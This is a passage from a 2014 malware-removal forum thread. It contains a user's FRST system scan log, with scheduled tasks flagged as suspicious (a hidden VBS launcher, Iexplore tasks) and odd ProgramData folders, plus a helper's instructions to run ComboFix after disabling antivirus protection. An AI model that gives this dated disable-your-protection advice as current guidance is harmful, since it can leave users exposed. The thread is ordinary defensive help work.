Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{67E03279-F703-408F-B4BF-46B5FC8D70CD}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 12.0 (x86 en-US) (HKLM\...\Mozilla Firefox 12.0 (x86 en-US)) (Version: 12.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 12.0 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Nikon Message Center 2 (HKLM\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.8.0 - Nikon)
Notepad++ (HKLM\...\Notepad++) (Version: 5.9.8 - )
NovaBench 3.0.4 (HKLM\...\{88603FC0-6B3C-442D-981E-E3D49F083548}_is1) (Version:  - Novawave Inc.)
NVIDIA 3D Vision Driver 311.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 311.06 - NVIDIA Corporation)
NVIDIA Control Panel 311.06 (Version: 311.06 - NVIDIA Corporation) Hidden
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version:  - )
NVIDIA ForceWare Network Access Manager (HKLM\...\InstallShield_{7CFA46E3-CC2F-4355-82AE-6012DC3633FD}) (Version: 1.00.6776 - NVIDIA Corporation)
NVIDIA ForceWare Network Access Manager (Version: 1.00.6776 - NVIDIA Corporation) Hidden
NVIDIA Graphics Driver 311.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 311.06 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.108.688 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (Version: 7.17.13.1106 - NVIDIA Corporation) Hidden
NVIDIA Update 1.11.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.11.3 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.11.3 - NVIDIA Corporation) Hidden
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Opera 11.64 (HKLM\...\Opera 11.64.1403) (Version: 11.64.1403 - Opera Software ASA)
Opera Next 12.50 internal build 1497 (HKLM\...\Opera 12.50.1497) (Version: 12.50.1497 - Opera Software ASA)
Paint Shop Pro 5.0 (HKLM\...\Paint Shop Pro 5.0) (Version:  - )
Picture Control Utility (HKLM\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.4.13 - Nikon)
QuickTime (HKLM\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5648 - Realtek Semiconductor Corp.)
Skype™ 6.11 (HKLM\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Sothink SWF Decompiler (HKLM\...\{BCDB856C-D247-4DEE-9132-89C02F4D6B8C}_is1) (Version: 7.1 - SourceTec Software Co., LTD)
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Uninstall Digital Binoculars Driver (HKLM\...\Digital Binoculars_is1) (Version:  - )
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_HOMESTUDENTR_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_HOMESTUDENTR_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2583910) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{BDC21583-5601-4B2B-88F3-7919F6DE8FB1}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_HOMESTUDENTR_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_HOMESTUDENTR_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Update for Outlook 2007 Junk Email Filter (KB2596560) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{2964DDE1-4925-4DF1-AF2C-0A36B3442228}) (Version:  - Microsoft)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VC80CRTRedist - 8.0.50727.4053 (Version: 1.1.0 - DivX, Inc) Hidden
ViewNX 2 (HKLM\...\{E64C137C-D0B7-467A-B47F-460AAB30F0A3}) (Version: 2.8.0 - Nikon)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 4.7 - Vuze Inc.)
WinDirStat 1.1.2 (HKCU\...\WinDirStat) (Version:  - )
WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
ZoneAlarm Firewall (Version: 10.1.065.000 - Check Point Software Technologies Ltd.) Hidden
ZoneAlarm LTD Toolbar (HKLM\...\ZoneAlarm LTD Toolbar) (Version:  - Check Point Software Technologies)
ZoneAlarm Security (Version: 10.1.065.000 - Check Point Software Technologies Ltd.) Hidden
ZoneAlarm Security (Version: 10.2.047.000 - Check Point Software Technologies Ltd.) Hidden
Zoom (HKLM\...\{237FB6DF-B351-4567-9226-4CE4A9CBBEA8}) (Version: 1.0 - Zoom Video Communications, Inc.)

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.

==================== Hosts content: ==========================

2006-11-02 03:23 - 2006-09-18 14:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost

==================== Scheduled Tasks (whitelisted) =============

Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1F4208F5-190A-406D-BF63-577898F904B7} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {268AB3AE-75B8-45C5-8FB7-9AF520BC528C} - System32\Tasks\4793 => Wscript.exe C:\Users\MIKEAN~1\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {28288DDD-2F66-4CC9-ADE0-54157CAA86A0} - System32\Tasks\Express Files Updater => C:\Program Files\ExpressFiles\EFupdater.exe <==== ATTENTION
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {59F41FC3-C3B3-4342-9101-18367415CF66} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {70830A18-7CE6-49AE-8535-8E8A799CBAE2} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2011-11-16] (Google Inc.)
Task: {7EEEE5C7-3F7D-4088-BD12-7B5C896F8674} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2011-11-16] (Google Inc.)
Task: {A6742FBB-2DFC-4334-92E4-F899CD00A6F5} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => C:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {CAC7B090-951A-46AF-9373-5A3C6974468C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-08] (Adobe Systems Incorporated)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {EE905EB3-3699-44DF-A8E2-E7197CB85F22} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2012-01-08 06:41 - 2012-01-08 06:41 - 00093696 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2011-04-24 10:34 - 2011-03-02 12:40 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll
2009-04-09 18:22 - 2007-03-05 09:22 - 00081920 _____ () C:\Program Files\FinePixViewerS\wia_register_event.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\ProgramData\TEMP:359B3BDA
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84
AlternateDataStreams: C:\ProgramData\TEMP:9A870F8B
AlternateDataStreams: C:\ProgramData\TEMP:A8ADE5D8
AlternateDataStreams: C:\ProgramData\TEMP:C7DEC6B7
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\08317434.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\59176720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\08317434.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\59176720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"

==================== EXE Association (whitelisted) =============

==================== MSCONFIG/TASK MANAGER disabled items =========

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: ehRecvr => 3
MSCONFIG\Services: ehSched => 3
MSCONFIG\Services: ehstart => 2
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: IswSvc => 2
MSCONFIG\Services: seclogon => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: WMPNetworkSvc => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^MikeandBert^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #3
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (07/20/2014 00:17:54 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/20/2014 10:42:53 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point on volume (Process = C:\Windows\system32\svchost.exe -k netsvcs; Descripton = Windows Update; Hr = 0x81000101).

Error: (07/20/2014 10:26:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/19/2014 04:32:56 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/19/2014 04:22:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application dllhost.exe, version 6.0.6000.16386, time stamp 0x4549b14e, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x000c01e2,
process id 0x2328, application start time 0xdllhost.exe0.

Error: (07/19/2014 03:33:45 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: Home-PC)
Description: HRESULT:0x8004FF84
Description:Cannot complete the Security Essentials Upgrade. Security Essentials is not currently monitoring and helping to protect your computer. Please restart your computer and try again. Error code:0x8004FF84.

Error: (07/19/2014 03:32:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16561 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: a68
Start Time: 01cfa39fbc3fa431
Termination Time: 1225

Error: (07/19/2014 03:31:44 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16561 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: 2874
Start Time: 01cfa39f8eeac0a1
Termination Time: 10418

Error: (07/19/2014 03:27:16 PM) (Source: MsiInstaller) (EventID: 11714) (User: Home-PC)
Description: Product: Microsoft Security Client -- Error 1714. The older version of Microsoft Security Client cannot be removed.  Contact your technical support group.  System Error 1612.

Error: (07/19/2014 03:10:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application dllhost.exe, version 6.0.6000.16386, time stamp 0x4549b14e, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x000501e2,
process id 0x22fc, application start time 0xdllhost.exe0.

System errors:
=============
Error: (07/20/2014 00:19:32 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/20/2014 00:17:56 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: CSN5PDTS82
CSN5PDTS82x64

Error: (07/20/2014 00:16:55 PM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer Send To OneNote 2007 with shared resource name Send To OneNote 2007. Error 2114. The printer cannot be used by others on the network.

Error: (07/20/2014 00:16:44 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:15:07 PM on 7/20/2014 was unexpected.

Error: (07/20/2014 10:54:26 AM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer DOC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{EF6BA016-F284-490A-B0CE-D80828CE6304}.
The master browser is stopping or an election is being forced.

Error: (07/20/2014 10:46:30 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: 0x80070643Security Update for Microsoft Silverlight (KB2932677){C6BF131F-BE90-438C-BA58-A732368D8A96}201

Error: (07/20/2014 10:28:32 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/20/2014 10:28:21 AM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer DOC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{EF6BA016-F284-490A-B0CE-D80828CE6304}.
The master browser is stopping or an election is being forced.

Error: (07/20/2014 10:26:42 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: CSN5PDTS82
CSN5PDTS82x64

Error: (07/19/2014 04:39:25 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer DOC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{EF6BA016-F284-490A-B0CE-D80828CE6304}.
The master browser is stopping or an election is being forced.

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-07-20 12:20:57.410
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:20:56.989
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:20:56.615
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:20:56.225
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:01.703
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:01.284
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:00.887
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:00.477
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:03:50.356
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:03:49.965
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Percentage of memory in use: 53%
Total physical RAM: 1789.8 MB
Available physical RAM: 830.36 MB
Total Pagefile: 3835.46 MB
Available Pagefile: 2495.39 MB
Total Virtual: 2047.88 MB
Available Virtual: 1905.55 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:69.52 GB) (Free:15.7 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:69.53 GB) (Free:39.77 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149 GB) (Disk ID: F7F82EBE)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=70 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=70 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:18 AM

Posted 20 July 2014 - 02:47 PM

Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 mcgrotty

mcgrotty
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:18 PM

Posted 20 July 2014 - 06:04 PM

ComboFix 14-07-20.02 - MikeandBert 07/20/2014  14:49:32.1.1 - x86
Running from: c:\users\MikeandBert\Desktop\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\END
c:\programdata\2380826522
c:\programdata\306e3167k4378pw12x73il28v4rnqxn
